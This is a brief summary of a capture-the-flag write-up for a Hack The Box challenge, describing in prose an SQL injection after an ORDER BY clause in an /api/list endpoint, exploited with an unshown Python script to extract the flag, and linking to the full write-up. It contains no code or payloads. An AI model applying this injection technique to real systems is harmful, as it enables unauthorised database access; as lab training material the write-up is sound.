The server was vulnerable to SQL injection within the /api/list API endpoint, which allowed for the flag to be discovered. This was a fairly laborious process, as the SQL injection was after an ‘ORDER BY’ statement, which increased the complexity of exploiting it.

Using a Python script, we can automate the process to discover the name of the flag table and then the flag contents.

Original writeup (https://http418infosec.com/htb-cyber-apocalypse-emoji-voting-writeup).